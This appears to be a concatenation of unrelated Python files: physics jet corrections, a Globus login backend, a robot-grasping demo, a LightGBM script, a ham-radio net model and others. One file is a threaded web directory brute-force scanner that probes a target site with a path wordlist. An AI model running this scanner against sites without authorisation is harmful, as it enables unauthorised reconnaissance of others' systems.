for i in [self.L1JetPar,self.L2JetPar,self.L3JetPar,self.ResJetPar]: self.vParL3Res.push_back(i)
self.separateJetCorrectors["L1L2L3Res"] = ROOT.FactorizedJetCorrector(self.vParL3Res)
def getCorrection(self,jet,rho,delta=0,corrector=None):
if not corrector: corrector = self.JetCorrector
if corrector != self.JetCorrector and delta!=0: raise RuntimeError('Configuration not supported')
corrector.setJetEta(jet.eta)
corrector.setJetPt(jet.pt*(1.-jet.rawFactor))
corrector.setJetA(jet.area)
corrector.setRho(rho)
corr = corrector.getCorrection()
if delta != 0:
if not self.JetUncertainty: raise RuntimeError("Jet energy scale uncertainty shifts requested, but not available")
self.JetUncertainty.setJetEta(jet.eta())
self.JetUncertainty.setJetPt(corr * jet.pt() * jet.rawFactor())
try:
jet.jetEnergyCorrUncertainty = self.JetUncertainty.getUncertainty(True)
except RuntimeError as r:
print "Caught %s when getting uncertainty for jet of pt %.1f, eta %.2f\n" % (r,corr * jet.pt() * jet.rawFactor(),jet.eta())
jet.jetEnergyCorrUncertainty = 0.5
#print " jet with corr pt %6.2f has an uncertainty %.2f " % (jet.pt()*jet.rawFactor()*corr, jet.jetEnergyCorrUncertainty)
corr *= max(0, 1+delta*jet.jetEnergyCorrUncertainty)
return corr
def correct(self,jet,rho,delta=0,addCorr=False,addShifts=False, metShift=[0,0]):
"""Corrects a jet energy (optionally shifting it also by delta times the JEC uncertainty)
If addCorr, set jet.corr to the correction.
If addShifts, set also the +1 and -1 jet shifts
The metShift vector will accumulate the x and y changes to the MET from the JEC, i.e. the
negative difference between the new and old jet momentum, for jets eligible for type1 MET
corrections, and after subtracting muons. The pt cut is applied to the new corrected pt.
This shift can be applied on top of the *OLD TYPE1 MET*, but only if there was no change
in the L1 corrections nor in the definition of the type1 MET (e.g. jet pt cuts).
"""
raw = 1.-jet.rawFactor
corr = self.getCorrection(jet,rho,delta)
if corr <= 0:
return jet.pt
newpt = jet.pt*raw*corr
return newpt
|
import cvxpy as cp
import numpy as np
import torch
def cvxLP(X, Y, xn):
# solve min gamma
# s.t. |x_i theta - y_i | <= gamma
# <=> -gamma <= x_i theta - y_i <= gamma
# <=> x_i theta - gamma <= y_i
# -x_i theta - gamma <= -y_i
X = X.numpy()
Y = Y.numpy()
n = X.shape[0]
dim = X.shape[1]
XX = np.concatenate((X, -X), 0)
YY = np.concatenate((Y, -Y), 0).squeeze(1)
#set up LP
theta = cp.Variable(dim+1)
XX = np.concatenate((XX, -np.ones((2*n,1))), axis=1)
c = np.zeros((dim+1,1))
c[-1] = 1.0
prob = cp.Problem(cp.Minimize(c.T @ theta),
[XX @ theta <= YY])
prob.solve()
theta = theta.value
gamma = theta[-1]
theta = theta[0:-1]
r = np.matmul(X, theta.reshape(dim,1)) - Y
r = abs(r).squeeze()
Midx = np.argsort(r)[-(dim+1):]
# Solutions
M = Midx[0:dim+1]
d = np.max(r)
#convert to torch
theta = torch.tensor(theta, dtype = torch.float64).view(-1, 1)
d = torch.tensor(d, dtype = torch.float64)
M = torch.tensor(M, dtype = torch.int64).view(1, -1)
return theta, d, M
|
"""
Globus Auth OpenID Connect backend, docs at:
https://docs.globus.org/api/auth
"""
import logging
from social_core.backends.globus import (
GlobusOpenIdConnect as GlobusOpenIdConnectBase
)
from social_core.exceptions import AuthForbidden
from globus_portal_framework.gclients import (
get_service_url, GROUPS_SCOPE, GLOBUS_GROUPS_V2_MY_GROUPS
)
log = logging.getLogger(__name__)
class GlobusOpenIdConnect(GlobusOpenIdConnectBase):
OIDC_ENDPOINT = get_service_url('auth')
GLOBUS_APP_URL = 'https://app.globus.org'
# Fixed by https://github.com/python-social-auth/social-core/pull/577
JWT_ALGORITHMS = ['RS512']
def introspect_token(self, auth_token):
return self.get_json(
self.OIDC_ENDPOINT + '/v2/oauth2/token/introspect',
method='POST',
data={"token": auth_token,
"include": "session_info,identities_set"},
auth=self.get_key_and_secret()
)
def get_globus_identities(self, auth_token, identities_set):
return self.get_json(
self.OIDC_ENDPOINT + '/v2/api/identities',
method='GET',
headers={'Authorization': 'Bearer ' + auth_token},
params={'ids': ','.join(identities_set),
'include': 'identity_provider'},
)
def get_user_details(self, response):
# If SOCIAL_AUTH_GLOBUS_SESSIONS is not set, fall back to default
if not self.setting('SESSIONS'):
return super(GlobusOpenIdConnectBase, self).get_user_details(
response)
auth_token = response.get('access_token')
introspection = self.introspect_token(auth_token)
identities_set = introspection.get('identities_set')
# Find the latest authentication
ids = introspection.get('session_info').get('authentications').items()
identity_id = None
idp_id = None
auth_time = 0
for auth_key, auth_info in ids:
at = auth_info.get('auth_time')
if at > auth_time:
identity_id = auth_key
idp_id = auth_info.get('idp')
auth_time = at
# Get user identities
user_identities = self.get_globus_identities(auth_token, identities_set)
for item in user_identities.get('identities'):
if item.get('id') == identity_id:
fullname, first_name, last_name = self.get_user_names(
item.get('name'))
return {
'username': item.get('username'),
'email': item.get('email'),
'fullname': fullname,
'first_name': first_name,
'last_name': last_name,
'identity_id': identity_id,
'idp_id': idp_id,
'identities': user_identities
}
return None
def get_user_id(self, details, response):
if not self.setting('SESSIONS'):
return super(GlobusOpenIdConnect, self).get_user_id(details,
response)
return details.get('idp_id') + '_' + details.get('identity_id')
def auth_allowed(self, response, details):
if not self.setting('SESSIONS'):
return super(GlobusOpenIdConnect, self).auth_allowed(response,
details)
allowed_groups = [g['uuid']
for g in self.setting('ALLOWED_GROUPS', [])]
if not allowed_groups:
log.info('settings.SOCIAL_AUTH_GLOBUS_ALLOWED_GROUPS is not '
'set, all users are allowed.')
return True
identity_id = details.get('identity_id')
username = details.get('username')
user_groups = self.get_user_globus_groups(response.get('other_tokens'))
# Fetch all groups where the user is a member.
allowed_user_groups = [group for group in user_groups
if group['id'] in allowed_groups]
allowed_user_member_groups = []
for group in allowed_user_groups:
gname, gid = group.get('name'), group['id']
for membership in group['my_memberships']:
if identity_id == membership['identity_id']:
log.info('User {} ({}) granted access via group {} ({})'
.format(username, identity_id, gname, gid))
return True
else:
allowed_user_member_groups.append(membership)
log.debug('User {} ({}) is not a member of any allowed groups. '
'However, they may be able to login with {}'.format(
username, identity_id, allowed_user_member_groups)
)
raise AuthForbidden(
self, {'allowed_user_member_groups': allowed_user_member_groups}
)
def get_user_globus_groups(self, other_tokens):
"""
Given the 'other_tokens' key provided by user details, fetch all
groups a user belongs. The API is PUBLIC, and no special allowlists
are needed to use it.
"""
groups_token = None
for item in other_tokens:
if item.get('scope') == GROUPS_SCOPE:
groups_token = item.get('access_token')
if groups_token is None:
raise ValueError(
'You must set the {} scope on {} in order to set an allowed '
'group'.format(GROUPS_SCOPE,
'settings.SOCIAL_AUTH_GLOBUS_SCOPE')
)
# Get the allowed group
return self.get_json(
'{}{}'.format(get_service_url('groups'),
GLOBUS_GROUPS_V2_MY_GROUPS),
method='GET',
headers={'Authorization': 'Bearer ' + groups_token}
)
def auth_params(self, state=None):
params = super(GlobusOpenIdConnect, self).auth_params(state)
# If Globus sessions are enabled, force Globus login, and specify a
# required identity if already known
if not self.setting('SESSIONS'):
return params
params['prompt'] = 'login'
session_message = self.strategy.session_pop('session_message')
if session_message:
params['session_message'] = session_message
params['session_required_identities'] = self.strategy.session_pop(
'session_required_identities')
return params
|
# SweepGen2x.py
#
# A DEMO Audio Sweep Generator from 4KHz down to 100Hz and back up again
# using standard Text Mode Python. Another kids level piece of simple, FREE,
# Test Gear project code...
# This working idea is copyright, (C)2010, B.Walker, G0LCU.
# Written in such a way that anyone can understand how it works.
#
# Tested on PCLinuxOS 2009 and Debian 6.0.0 using Python 2.6.2, 2.6.6 and 2.7.2.
# It may well work on much earlier versions of Python but it is untested...
# "/dev/dsp" IS required for this to work; therefore if you haven't got it then
# install "oss-compat" from you distro's repository. Ensure the sound system is
# not already in use.
# It is easily possible to lengthen the higher frequency playing times and VERY
# easily alter the output level and to speed up or slow down the sweep speed.
# I'll let the big guns do that for you...
# IMPORTANT NOTE:- Every EVEN number of characters is a symmetrical "square" wave
# BUT every ODD number of characters has preference for the "space" by one character.
#
# To run this DEMO type at the Python prompt......
#
# >>> execfile("/full/path/to/SweepGen2x.py")<RETURN/ENTER>
#
# ......and away you go.
#
# Note:- NO import[s] required at all, good eh! ;o)
def main():
# Set all "variables" as globals, my choice... ;o)
global mark
global space
global freq
global stringlength
global n
global sweep
# Allocate initial values.
mark="\xff"
space="\x00"
freq=mark+space
# 8KHz is the default sample speed of the sound system.
# Therefore this sets the lowest frequency, 8KHz/80=100Hz...
stringlength=80
n=0
sweep=0
# A simple screen clear and user screen for a default Python window...
for n in range(0,40,1):
print "\r\n"
print "Sweep Generator DEMO from 4KHz down to 100HZ and back again...\n"
print "This just gives 5 SIREN like sweeps but it is enough for this DEMO...\n"
print "Copyright, (C)2010, B.Walker, G0LCU.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
# Open the audio device, "/dev/dsp" for writing.
audio=open("/dev/dsp", "wb")
# Sweep for five times only for this DEMO...
while sweep<=4:
freq=mark+space
stringlength=80
n=0
while 1:
# Sweep down from 4KHz to 100Hz.
# Add a trailing 0x00 character.
audio.write(freq)
freq=freq+space
# Quit when length of "freq" string is 80 characters.
if len(freq)>=stringlength: break
audio.write(freq)
# Add a leading 0xff character.
freq=mark+freq
# Quit when length of "freq" string is 80 characters.
if len(freq)>=stringlength: break
while 1:
# Sweep back up again from 100Hz to 4KHz.
# Start with an empty string.
freq=""
# Now create a new square wave string.
for n in range(0,int((stringlength)/2),1):
freq=freq+mark
for n in range(0,int((stringlength)/2),1):
freq=freq+space
audio.write(freq)
# Create a new string reduced by one character.
# This removes one 0xff character.
stringlength=stringlength-1
# Quit when length of "freq" string is 2 characters.
if len(freq)<=2: break
# Start with an empty string.
freq=""
# Now create a new string reduced by one character.
for n in range(0,int((stringlength)/2),1):
freq=freq+mark
for n in range(0,int(((stringlength)/2)+1),1):
freq=freq+space
audio.write(freq)
# This removes one 0x00 character.
stringlength=stringlength-1
# Quit when length of "freq" string is 2 characters.
if len(freq)<=2: break
sweep=sweep+1
# Ensure a complete exit from the loop.
if sweep>=5: break
# On exit ensure the audio device is closed.
audio.close()
main()
# End of SweepGen2x.py DEMO...
# Enjoy finding simple solutions to often VERY difficult problems... ;o)
|
import socket
import telnetlib
import time
from typing import Optional
from termcolor import colored
from cool.util import b2s
from .tube import Tube
class Remote(Tube):
"""Class for connecting to a remote server.
:param host: host name of the server
:param port: port number of the server
:param timeout: timeout in seconds
"""
def __init__(self, host: str, port: int, timeout: Optional[int] = None) -> None:
self.host = host
self.port = port
self.timeout = timeout
self.conn = socket.create_connection((self.host, self.port))
def close(self) -> None:
"""Close the connection.
"""
self.conn.close()
def interact(self) -> None:
"""Launch the interactive shell to the server.
"""
t = telnetlib.Telnet()
# "Telnet" HAS "sock" ATTRIBUTE!!
t.sock = self.conn # type: ignore
# Telnet.interact() will call text.decode("ascci") but this will fail sometimes.
# We just print bytes itself for avoiding UnicodeDecodeError.
while True:
try:
time.sleep(0.5)
inp = b2s(t.read_very_eager())
print(inp)
out = input(colored(">> ", "green"))
t.write(out.encode("utf8") + b"\n")
except (EOFError, BrokenPipeError):
break
def recv(self, numb: int = 4096, timeout: Optional[int] = None) -> bytes:
"""Receive data from the server.
:param numb: maximum data size to receive
:param timeout: timeout in seconds
:return: received data
"""
self.__settimeout(timeout)
try:
data = self.conn.recv(numb)
except socket.timeout:
raise TimeoutError
return data
def send(self, data: bytes, timeout: Optional[int] = None) -> None:
"""Send data to the server.
:param data: data to send
:param timeout: timeout in seconds
"""
self.__settimeout(timeout)
try:
self.conn.sendall(data)
except socket.timeout:
raise TimeoutError
def __settimeout(self, timeout: Optional[int] = None) -> None:
if timeout is None:
self.conn.settimeout(self.timeout)
else:
self.conn.settimeout(timeout)
def remote(host: str, port: int, timeout: Optional[int] = None) -> Remote:
"""Create a remote connection the server.
:param host: host name of the server
:param port: port number of the server
:param timeout: timeout in seconds
"""
return Remote(host, port, timeout=timeout)
|
__author__ = 'faner'
def check_callable(target):
if not (target and callable(target)):
raise TypeError('target is not callable!')
class PromiseRunner(object):
def __init__(self, promiseObj, run):
self._promiseObj = promiseObj
from threading import Thread
def _run_wrap():
try:
self._result = run()
self._promiseObj.do_then()
except Exception, e:
self._promiseObj.do_fail()
self._runner = Thread(target=_run_wrap)
self._runner.start()
class Promise(object):
def __init__(self, call):
pr = self._pr = PromiseRunner(self, call)
self._result = None
self._success = True
self._completed = False
@property
def completed(self):
return self._completed
@property
def result(self):
return self._result
@property
def success(self):
return self._success
def do_then(self):
self._result = self._success_callback()
self._success, self._completed = True, True
def do_fail(self):
self._result = self._fail_callback()
self._success, self._completed = False, True
def then(self, success_callback):
check_callable(success_callback)
self._success_callback = success_callback
return self
def fail(self, fail_callback):
check_callable(fail_callback)
self._fail_callback = fail_callback
return self
def PromiseWrapper(target, *args, **kwargs):
return Promise(lambda: target(*args, **kwargs))
def promise_decorator(target):
def _func(*args, **kwargs):
return Promise(lambda: target(*args, **kwargs))
return _func
|
import argparse
import pickle
import os
import sys
from pdb import set_trace as bp
import numpy as np
import torch
#import gym
import my_pybullet_envs
import pybullet as p
import time
from a2c_ppo_acktr.envs import VecPyTorch, make_vec_envs
from a2c_ppo_acktr.utils import get_render_func, get_vec_normalize
import inspect
from NLP_module import NLPmod
from my_pybullet_envs.inmoov_arm_obj_imaginary_sessions import ImaginaryArmObjSession ,URDFWriter
from my_pybullet_envs.inmoov_shadow_place_env_v3 import InmoovShadowHandPlaceEnvV3
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
homedir = os.path.expanduser("~")
# TODO: main module depends on the following code/model:
# demo env: especially observation
# the settings of inmoov hand v2
# obj sizes & frame representation
# constants
DEMO_ENV_NAME = 'ShadowHandDemoBulletEnv-v1'
GRASP_PI = '0114_cyl_s_1'
GRASP_DIR = "./trained_models_%s/ppo/" % GRASP_PI
GRASP_PI_ENV_NAME = 'InmoovHandGraspBulletEnv-v1'
PLACE_PI = '0114_cyl_s_1_place_v3_2'
PLACE_DIR = "./trained_models_%s/ppo/" % PLACE_PI
PLACE_PI_ENV_NAME = 'InmoovHandPlaceBulletEnv-v3'
STATE_NORM = True
OBJ_MU = 1.0
FLOOR_MU = 1.0
# HAND_MU = 3.0
sys.path.append('a2c_ppo_acktr')
parser = argparse.ArgumentParser(description='RL')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--non-det', type=int, default=0)
args = parser.parse_args()
args.det = not args.non_det
IS_CUDA = True
DEVICE = 'cuda' if IS_CUDA else 'cpu'
TS = 1./240
TABLE_OFFSET = [0.25, 0.1, 0.0] # TODO: chaged to 0.2 for vision, 0.25 may collide, need to change OR reaching.
HALF_OBJ_HEIGHT_L = 0.09
HALF_OBJ_HEIGHT_S = 0.07 # todo: 0.065 now
PLACE_CLEARANCE = 0.16
# test only one obj
g_tx = 0.2
g_ty = 0.3
p_tx = 0.1
p_ty = -0.1
p_tz = 0.0 # TODO: depending on placing on floor or not
def get_relative_state_for_reset(oid):
obj_pos, obj_quat = p.getBasePositionAndOrientation(oid) # w2o
hand_pos, hand_quat = env_core.robot.get_link_pos_quat(env_core.robot.ee_id) # w2p
inv_h_p, inv_h_q = p.invertTransform(hand_pos, hand_quat) # p2w
o_p_hf, o_q_hf = p.multiplyTransforms(inv_h_p, inv_h_q, obj_pos, obj_quat) # p2w*w2o
fin_q, _ = env_core.robot.get_q_dq(env_core.robot.all_findofs)
state = {'obj_pos_in_palm': o_p_hf, 'obj_quat_in_palm': o_q_hf,
'all_fin_q': fin_q, 'fin_tar_q': env_core.robot.tar_fin_q}
return state
def load_policy_params(dir, env_name, iter=None):
if iter is not None:
path = os.path.join(dir, env_name + "_" + str(iter) + ".pt")
else:
path = os.path.join(dir, env_name + ".pt")
if IS_CUDA:
actor_critic, ob_rms = torch.load(path)
else:
actor_critic, ob_rms = torch.load(path, map_location='cpu')
vec_norm = get_vec_normalize(env)
if not STATE_NORM: assert ob_rms is None
if vec_norm is not None:
vec_norm.eval()
vec_norm.ob_rms = ob_rms
recurrent_hidden_states = torch.zeros(1, actor_critic.recurrent_hidden_state_size)
masks = torch.zeros(1, 1)
return actor_critic, ob_rms, recurrent_hidden_states, masks # probably only first one is used
# set up world
p.connect(p.GUI)
p.resetSimulation()
p.setTimeStep(TS)
p.setGravity(0, 0, -10)
env = make_vec_envs(
DEMO_ENV_NAME,
args.seed,
1,
None,
None,
device=DEVICE,
allow_early_resets=False)
env_core = env.venv.venv.envs[0].env.env
# env.reset() # TODO: do we need to call reset After loading the objects?
# env_core.robot.change_hand_friction(HAND_MU)
oid1 = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/cylinder_small.urdf'), [g_tx, g_ty, HALF_OBJ_HEIGHT_S+0.001],
useFixedBase=0)
p.changeDynamics(oid1, -1, lateralFriction=OBJ_MU)
table_id = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/tabletop.urdf'), TABLE_OFFSET,
useFixedBase=1)
p.changeDynamics(table_id, -1, lateralFriction=FLOOR_MU)
# ready to grasp
sess = ImaginaryArmObjSession()
Qreach = np.array(sess.get_most_comfortable_q_and_refangle(g_tx, g_ty)[0])
env_core.robot.reset_with_certain_arm_q(Qreach)
env_core.assign_estimated_obj_pos(g_tx, g_ty) # env_core.tx = will not work
g_actor_critic, g_ob_rms, recurrent_hidden_states, masks = load_policy_params(GRASP_DIR, GRASP_PI_ENV_NAME) # latter 2 returns dummy
# g_obs = torch.Tensor([env_core.getExtendedObservation()])
# print(g_obs)
g_obs = env.reset()
print("gobs", g_obs)
if IS_CUDA:
g_obs = g_obs.cuda()
input("ready to grasp")
# grasp!
control_steps = 0
for i in range(95):
with torch.no_grad():
value, action, _, recurrent_hidden_states = g_actor_critic.act(
g_obs, recurrent_hidden_states, masks, deterministic=args.det)
# print(g_obs)
# print(action)
# input("press enter")
g_obs, reward, done, _ = env.step(action)
print(g_obs)
print(action)
print(control_steps)
control_steps += 1
# input("press enter g_obs")
masks.fill_(0.0 if done else 1.0)
# if control_steps >= 100: # done grasping
# for _ in range(1000):
# p.stepSimulation()
# time.sleep(ts)
# masks.fill_(0.0 if done else 1.0)
state = get_relative_state_for_reset(oid1)
print("after grasping", state)
p.disconnect()
p.connect(p.GUI)
env = make_vec_envs(
DEMO_ENV_NAME,
args.seed,
1,
None,
None,
device=DEVICE,
allow_early_resets=False)
env_core = env.venv.venv.envs[0].env.env
desired_obj_pos = [p_tx, p_ty, PLACE_CLEARANCE + p_tz]
a = InmoovShadowHandPlaceEnvV3(renders=False, is_box=False, is_small=True, place_floor=True, grasp_pi_name='0114_cyl_s_1')
arm_q =a.get_optimal_init_arm_q(desired_obj_pos)
print("place arm q", arm_q)
o_pos_pf = state['obj_pos_in_palm']
o_quat_pf = state['obj_quat_in_palm']
all_fin_q_init = state['all_fin_q']
tar_fin_q_init = state['fin_tar_q']
env_core.robot.reset_with_certain_arm_q_finger_states(arm_q, all_fin_q_init, tar_fin_q_init)
p_pos, p_quat = env_core.robot.get_link_pos_quat(env_core.robot.ee_id)
o_pos, o_quat = p.multiplyTransforms(p_pos, p_quat, o_pos_pf, o_quat_pf)
table_id = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/tabletop.urdf'), TABLE_OFFSET,
useFixedBase=1)
p.changeDynamics(table_id, -1, lateralFriction=FLOOR_MU)
oid1 = p.loadURDF(os.path.join(currentdir, 'my_pybullet_envs/assets/cylinder_small.urdf'), o_pos, o_quat,
useFixedBase=0)
p.changeDynamics(oid1, -1, lateralFriction=OBJ_MU)
state = get_relative_state_for_reset(oid1)
print("before releasing", state)
print(env_core.withVel)
p_actor_critic, p_ob_rms, recurrent_hidden_states, masks = load_policy_params(PLACE_DIR, PLACE_PI_ENV_NAME) # latter 2 returns dummy
p_obs = env.reset()
print("pobs", p_obs)
if IS_CUDA:
p_obs = p_obs.cuda()
input("ready to place")
# place!
control_steps = 0
for i in range(95):
with torch.no_grad():
value, action, _, recurrent_hidden_states = p_actor_critic.act(
p_obs, recurrent_hidden_states, masks, deterministic=args.det)
# print(g_obs)
p_obs, reward, done, _ = env.step(action)
# print(action)
# print(g_obs)
# input("press enter g_obs")
masks.fill_(0.0 if done else 1.0)
# g_obs = torch.Tensor([env_core.getExtendedObservation(withVel=True)])
control_steps += 1
# if control_steps >= 100: # done grasping
# for _ in range(1000):
# p.stepSimulation()
# time.sleep(ts)
# masks.fill_(0.0 if done else 1.0)
|
import json
import logging
import math
import numbers
import os
import platform
import resource
import sys
from collections import MutableMapping
from contextlib import contextmanager
from IPython.core.display import display, HTML
from pyhocon import ConfigFactory
from pyhocon import ConfigMissingException
from pyhocon import ConfigTree
from pyhocon import HOCONConverter
from gtd.utils import NestedDict, Config
def in_ipython():
try:
__IPYTHON__
return True
except NameError:
return False
def print_with_fonts(tokens, sizes, colors, background=None):
def style(text, size=12, color='black'):
return u'<span style="font-size: {}px; color: {};">{}</span>'.format(size, color, text)
styled = [style(token, size, color) for token, size, color in zip(tokens, sizes, colors)]
text = u' '.join(styled)
if background:
text = u'<span style="background-color: {};">{}</span>'.format(background, text)
display(HTML(text))
def gb_used():
used = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
if platform.system() != 'Darwin':
# on Linux, used is in terms of kilobytes
power = 2
else:
# on Mac, used is in terms of bytes
power = 3
return float(used) / math.pow(1024, power)
class Metadata(MutableMapping):
"""A wrapper around ConfigTree.
Supports a name_scope contextmanager.
"""
def __init__(self, config_tree=None):
if config_tree is None:
config_tree = ConfigTree()
self._config_tree = config_tree
self._namestack = []
@contextmanager
def name_scope(self, name):
self._namestack.append(name)
yield
self._namestack.pop()
def _full_key(self, key):
return '.'.join(self._namestack + [key])
def __getitem__(self, key):
try:
val = self._config_tree.get(self._full_key(key))
except ConfigMissingException:
raise KeyError(key)
if isinstance(val, ConfigTree):
return Metadata(val)
return val
def __setitem__(self, key, value):
"""Put a value (key is a dot-separated name)."""
self._config_tree.put(self._full_key(key), value)
def __delitem__(self, key):
raise NotImplementedError()
def __iter__(self):
return iter(self._config_tree)
def __len__(self):
return len(self._config_tree)
def __repr__(self):
return self.to_str()
def to_str(self):
return HOCONConverter.convert(self._config_tree, 'hocon')
def to_file(self, path):
with open(path, 'w') as f:
f.write(self.to_str())
@classmethod
def from_file(cls, path):
config_tree = ConfigFactory.parse_file(path)
return cls(config_tree)
class SyncedMetadata(Metadata):
"""A Metadata object which writes to file after every change."""
def __init__(self, path):
if os.path.exists(path):
m = Metadata.from_file(path)
else:
m = Metadata()
super(SyncedMetadata, self).__init__(m._config_tree)
self._path = path
def __setitem__(self, key, value):
super(SyncedMetadata, self).__setitem__(key, value)
self.to_file(self._path)
def print_list(l):
for item in l:
print item
def print_no_newline(s):
sys.stdout.write(s)
sys.stdout.flush()
def set_log_level(level):
"""Set the log-level of the root logger of the logging module.
Args:
level: can be an integer such as 30 (logging.WARN), or a string such as 'WARN'
"""
if isinstance(level, str):
level = logging._levelNames[level]
logger = logging.getLogger() # gets root logger
logger.setLevel(level)
|
import numpy as np
import pandas as pd
import lightgbm as lgb
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GridSearchCV
data = {
'train': pd.read_pickle('../features/train_with_minmax_p2.pkl'),
'test': pd.read_pickle('../features/test_with_minmax_p2.pkl')
}
x_train = data['train'].drop(['visitors','store_id','visit_date','skew_visitors_g','std_visitors_g',
'std_visitors_s_d','skew_visitors_s_d'], axis=1)
y_train = np.log1p(data['train']['visitors'].values)
x_test = data['test'].drop(['store_id','visit_date','skew_visitors_g','std_visitors_g',
'std_visitors_s_d','skew_visitors_s_d'], axis=1)
x_train['air_diff_date_mean'] = x_train['air_diff_date_mean'].astype('timedelta64[s]')
x_train['hpg_diff_date_mean'] = x_train['hpg_diff_date_mean'].astype('timedelta64[s]')
x_train['week_of_year'] = x_train['week_of_year'].astype(np.int64)
x_test['air_diff_date_mean'] = x_test['air_diff_date_mean'].astype('timedelta64[s]')
x_test['hpg_diff_date_mean'] = x_test['hpg_diff_date_mean'].astype('timedelta64[s]')
x_test['week_of_year'] = x_test['week_of_year'].astype(np.int64)
# Binding to float32
for c, dtype in zip(x_train.columns, x_train.dtypes):
if dtype == np.float64:
x_train[c] = x_train[c].astype(np.float32)
for c, dtype in zip(x_test.columns, x_test.dtypes):
if dtype == np.float64:
x_test[c] = x_test[c].astype(np.float32)
x_test = x_test[x_train.columns]
gbm = lgb.LGBMRegressor(
boosting = 'gbdt',
objective='regression',
num_leaves=80,
learning_rate=0.01,
sub_feature = 0.8,
min_data_in_leaf = 15,
n_estimators=10000
)
gbm.fit(x_train, y_train, eval_metric='rmse')
predict_y = gbm.predict(x_test)
y_test = pd.read_csv('../data/sample_submission.csv',engine='python')
y_test['visitors'] = np.expm1(predict_y)
y_test[['id','visitors']].to_csv(
'0gbm_submission.csv', index=False, float_format='%.3f')
# Find the best parameters by GridSearchCV
#-----------------------------------------------------------------------------------------
# x_train, x_test, y_train, y_test = train_test_split(x_train, y_train, test_size=0.3)
# There are many parameters you can try.
# The more parameters you use, the more time you spend.
# parameters = {
# 'num_leaves' : [40, 60, 80],
# 'max_depth': [15, 20, 25],
# 'learning_rate': [0.008, 0.01, 0.02],
# 'feature_fraction': [0.6, 0.7, 0.8],
# 'sub_feature': [0.6, 0.7, 0.8],
# 'bagging_fraction': [0.6, 0.7, 0.8, 1],
# 'bagging_freq': [2, 4],
# 'min_data_in_leaf' : [5, 10, 15 , 20, 25, 30],
# 'lambda_l2': [0, 0.01, 0.1, 0.05, 0.5],
# }
# gbm = lgb.LGBMRegressor(
# boosting = 'gbdt',
# objective='regression',
# n_estimators=10000
# )
# gsearch = GridSearchCV(gbm, param_grid=parameters)
# gsearch.fit(x_train, y_train, eval_metric='rmse')
# print('Best parameters found by grid search are:', gsearch.best_params_)
# import math
# def rmsle(y, y_pred):
# assert len(y) == len(y_pred)
# terms_to_sum = [(math.log(y_pred[i] + 1) - math.log(y[i] + 1)) ** 2.0 for i,pred in enumerate(y_pred)]
# return (sum(terms_to_sum) * (1.0/len(y))) ** 0.5
# predict_y = gsearch.predict(x_test)
# print('The rmsle of prediction is:', rmsle(y_test, np.expm1(predict_y)))
|
# Copyright (c) 2017 Jared Crapo, K0TFU
import datetime
import persistent
import persistent.mapping
from netcontrol.checkin import Checkin
class Session(persistent.Persistent):
"""Model class for a single session of a directed ham radio net
Data elements for a specific instance of a directed net
Attributes
----------
net_control_station: Operator
The net control for this session of the net
frequency: str
Frequency for this session of the net, i.e. "447.100- T100Hz"
start: datetime
date and time in UTC zone when the session began
operators: dict
The amateur operators who have checked in to this net
events: list
sequential list of events that occured in this net
"""
def __init__(self,net):
self.net = net
self.net_control_station = None
self.frequency = None
self.start_datetime = None
self.operators = persistent.mapping.PersistentMapping()
self.events = persistent.list.PersistentList()
def checkin(self,operator):
# don't add operators without a callsign
if operator.callsign:
# use the callsign as the key = no duplicates
self.operators[operator.callsign] = operator
self.events.append(Checkin(operator))
# add this operator to the net if they aren't there
self.net.add_operator(operator)
def start(self):
self.start_datetime = datetime.datetime.now()
|
#-*- coding: gbk -*-
import requests
from threading import Thread, activeCount
import Queue
queue = Queue.Queue()
dir_file="php.txt"
def scan_target_url_exists(target_url):
headers={
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://www.google.com'}
status_codes = [200]
try:
req=requests.head(target_url.strip(),timeout=8,headers=headers)
if req.status_code in status_codes:
print 'CODE:%s,URL:%s'%(str(req.status_code),target_url.strip('\n').strip('\r'))
open('exist_target.txt','a').write(target_url)
except:
pass
def open_pathfile(file):
all_lines=open(file,'r').readlines()
for line in all_lines:
if target_url.endswith('/'):
if line.startswith('/'):
queue.put(target_url+line[1:])
else:
queue.put(target_url + line)
else:
if line.startswith('/'):
queue.put(target_url + line)
else:
queue.put(target_url + '/' + line)
if __name__ == '__main__':
print '''
____ _ ____
| _ \(_)_ __/ ___| ___ __ _ _ __
| | | | | '__\___ \ / __/ _` | '_ \
| |_| | | | ___) | (_| (_| | | | |
|____/|_|_| |____/ \___\__,_|_| |_|
'''
target_url=raw_input('Please input your target:')
threadnum = raw_input('Please input your threadnum:')
if target_url.startswith('http://') or target_url.startswith('https://'):
pass
else:
target_url = 'http://' + target_url
print 'The number of threads is %s' % threadnum
print 'Matching.......'
open_pathfile(dir_file)
while queue.qsize() > 0:
if activeCount() <= int(threadnum):
Thread(target=scan_target_url_exists,args=(queue.get(),)).start()
|
#!/usr/bin/env python
import logging
import sys
import unittest
import scipy as sp
import numpy as np
import mango.mpi as mpi
import mango.image
import mango.io
logger, rootLogger = mpi.getLoggers(__name__)
class NeighbourhoodFilterTest(unittest.TestCase):
def setUp(self):
self.mode = "mirror"
self.imgShape = (120, 65, 67)
self.diffTol = 0
def tearDown(self):
pass
def doMangoFiltering(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = self.callMangoFilter(input, se, stride=stride, boffset=boffset, eoffset=eoffset)
output.updateHaloRegions()
output.mirrorOuterLayersToBorder(False)
output.updateHaloRegions()
return output
def doScipyFiltering(self, input, se):
inDds = mango.copy(input, halo=se.getHaloSize())
inDds.updateHaloRegions()
inDds.mirrorOuterLayersToBorder(False)
inDds.updateHaloRegions()
outputArr = self.callScipyFilter(inDds, se)
output = mango.empty_like(inDds)
output.asarray()[...] = outputArr
output = mango.copy(output, halo=input.halo)
output.updateHaloRegions()
